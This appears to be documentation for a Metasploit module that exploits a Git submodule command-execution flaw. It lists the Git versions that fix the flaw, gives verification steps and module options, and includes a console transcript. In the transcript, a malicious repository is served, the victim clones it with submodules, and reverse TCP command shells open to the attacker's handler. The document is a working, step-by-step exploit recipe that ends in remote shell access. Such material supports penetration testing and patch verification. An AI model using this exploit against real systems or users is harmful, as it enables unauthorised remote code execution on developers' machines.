Brent Cook
2.1 KiB
Vulnerable Application
Git can be installed on a variety of operating systems, however newer versions may contain the patch for this vulnerability.
On OSX it can be installed with the XCode command line tools:
xcode-select --install
On Linux it can be installed with apt:
sudo apt-get update && sudo apt-get install git
You can check the version with git --version.
The fix is included in the following version:
2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
Verification Steps
Example steps in this format:
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/git_submodule_command_exec - Do:
set SRVHOST [local host] - Do:
set LHOST [local host] - Do:
exploit - Clone the malicious Git URI and its submodules
- You should get a shell
Options
GIT_URI
This is the URI the git repository will be hosted from (defaults to random).
GIT_SUBMODULE
This is the URI of the submodule within the git repository (defaults to random). The url of this submodule, when cloned, will execute the payload.
Scenarios
Example usage against a macOS Sierra x64 bit target running git version 2.10.1
msf > use exploit/multi/http/git_submodule_command_exec
msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(git_submodule_command_exec) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.0.1:4444
msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC
[*] Server started.
[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git
***
Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules
***
[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800
[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800